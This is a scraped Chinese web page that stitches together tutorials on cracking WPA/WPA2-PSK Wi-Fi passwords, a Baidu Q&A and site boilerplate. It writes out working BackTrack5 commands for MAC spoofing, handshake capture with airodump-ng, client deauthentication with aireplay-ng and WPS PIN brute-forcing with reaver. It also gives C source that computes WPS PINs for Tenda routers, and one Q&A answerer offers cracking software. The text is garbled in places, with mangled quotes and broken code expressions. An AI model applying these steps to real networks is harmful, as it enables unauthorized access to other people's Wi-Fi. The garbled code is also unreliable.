怎么解psk加蜜得wpa psk密码破解软件

来源:蜘蛛抓取(WebSpider) 时间:2015-08-25 23:19 标签: wpa psk密码破解
用BackTrack5破解WPA/WPA2-PSK密码
&说到BackTrack 大家应该第一个就想到破解wifi密码,没错,当年我一开始用BackTrack也是为了要破解密码阿&&^^&
前几天有朋友问我说怎么用BT5破解WPA/WPA2-PSK的密码,要破解WPA/WPA2-PSK的密码比起wep难了许多,说真的,除了工具外最需要的还是运气跟密码文件阿&..^^&
不多说,来看看吧!!
首先下载BT5的光盘候用BT5开机,哪边下载跟怎么设定开机就不要提了。
开机后透过 startx 指令进入桌面环境,BT5的桌面还挺漂亮的!!
首先先把装置停掉,改卡号,假设我的网卡界面是 wlan0
点击(此处)折叠或打开
airmon-ng stop wlan0
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
接着扫描我们要抓的AP
点击(此处)折叠或打开
airodump-ng wlan0
其中可以看到有非常多个AP,这边我们以我自己的AP为例子,再次声明,破解他人AP的密码是违法的行为。
其中我们要记得 BSSID: 84:C9:XX:XX:XX:XX 跟 CH:6
airodump-ng &-c (填入刚刚的CH) -w (随便给一个名字) &bssid (要破解的BSSID) wlan0
点击(此处)折叠或打开
airodump-ng -c 6 -w crack_pw_test &bssid 84:C9:XX:XX:XX:XX wlan0
其中画面会像这样子
我们可以看到有三个装置连到这个AP,随便选一个例如 (90:ZZ:ZZ:ZZ:ZZ:ZZ)
aireplay-ng &-0 10 &-a (BSSID) -c (client_MAC) wlan0
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】使用Reaver加PIN码秒破WPA-PSK密码
之前掌握到的破解WPA-PSK密码仅限于使用aircreack工具包获取handshake后挂字典爆破方式,而能否破解出wpa密码完全依赖于字典强度了。除了该方式外还有一个更有效的办法,就是使用路由PIN码然后使用BT5下自带的Reaver工具秒破WPA-PSK密码!
在已知PIN码的情况下可以在BT5下使用 reaver -i mon0 -b AP&s Mac -p pin 直接秒破!
现在比较难的就是怎么得到PIN的问题了,经常关注无线这方面的朋友应该知道现在腾达和磊科产品有保PIN算法漏洞,如果路由MAC地址是以&C83A35&或&00B00C&打头那么可以直接计算出PIN值,然后使用PIN值直接连接或者继续使用PIN值加reaver破解出wpa-psk。
除此之外,根据PIN特点同样也可以使用Reaver来穷举,pin码是一个8位数前四位是随机生成的而后4位是3个数字加1个checksum大大降低了穷举所需要的时间。
在BT5下可以使用 reaver -i mon0 -b AP's Mac -vv 来破解,这个过程可能需要花很多个小时,在网上有看到是3-10个小时,具体的我还未验证。reaver在此过程中还会保存进度(/usr/local/etc/reaver/AP&s MAC.wpc)到文件。
不过使用PIN方法破解WPA-PSK密码有一个限制,就是AP必须开启了QSS、WPS功能!我们可以在扫描AP的时候判断目标AP是否开启了QSS、WPS功能,如下图使用airodump-ng扫描时候在MB栏中后面有个&.&的就是。
或者在win7下面,连接AP时候在密码输入框下面有&通过按路由器按钮也可以连接&字样也是开启了QSS、wps的。
&C83A35&或&00B00C&打头路由PIN计算工具源码,大家可以自己编译:
//Computes PIN code starts with OUI &C83A35& and &00B00C&
//Both two OUIs which belonged to Tenda Technology Co., Ltd are confirmed effectively.
//Coded by Zhaochunsheng -
//Modified by Lingxi -
#include &stdio.h&
#include &stdlib.h&
#include &stdafx.h&
int main()
&&& unsigned int wps_pin_checksum(unsigned int pin);
&&& int PIN = 0;
&//&& printf(&ComputePIN-C83A35\n&);
&&& printf(&Description:\n&);
&&& printf(&If your wireless router MAC address start with \&C83A35\& or \&00B00C\&,\n&);
&&& printf(&type the other six digits, you might be able to get the \n&);
&&& printf(&WPS-PIN of this equipment, please have a try, good luck!\n\n&);
&&& printf(&Code by ZhaoChunsheng 04/07/2012& \n\n&);
&&& printf(&Modified by Lingxi - \n\n&);
//Translated to Chinese
&printf(&说明:\n&);
&printf(&如果您的无线路由器MAC地址以&C83A35&或&00B00C&打头,\n&);
&printf(&输入后六位MAC地址(不分大小写)您或许可以获得该路由的WPS PIN密钥!\n&);
&printf(&祝你好运!\n\n&);
&printf(&由赵春生编写于日&&&);
&printf(&由灵曦修改并汉化& \n\n&);
&&& printf(&请输入后六位MAC地址(HEX):\n&);
&&& printf(&Input the last 6 digits of MAC Address(HEX):&);
&&& scanf(&%x&,&PIN);& printf(&Last 6 digits of MAC Address(HEX) are: %X\n&,PIN);
&&& printf(&S PIN is: %07d%d\n&,PIN%,wps_pin_checksum(PIN%));
&&& return 0;
unsigned int wps_pin_checksum(unsigned int pin)
unsigned int accum = 0;
while (pin)
accum += 3 * (pin % 10);
pin /= 10;
accum += pin % 10;
pin /= 10;
&&& return (10 - accum % 10) % 10;wifi密码加密。WPA/WPA2PSK怎样破解?_百度知道
wifi密码加密。WPA/WPA2PSK怎样破解?
您的回答被采纳后将获得:
系统奖励20(财富值+经验值)+难题奖励20(财富值+经验值)
我有更好的答案
买个清冷的晚风卡王,用电脑解不解释
一般来说,都是用奶瓶暴力破解吧。。需要的话我可以给你教程和软件。。
其他类似问题
为您推荐:
wifi的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁wpa2_psk无线破解_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
评价文档:
wpa2_psk无线破解
w​p​a_​p​s​k​无​线​密​码​破​解
阅读已结束,如果下载本文需要使用
想免费下载本文?
你可能喜欢

我要回帖

更多关于 wpa psk密码破解 的文章

 

随机推荐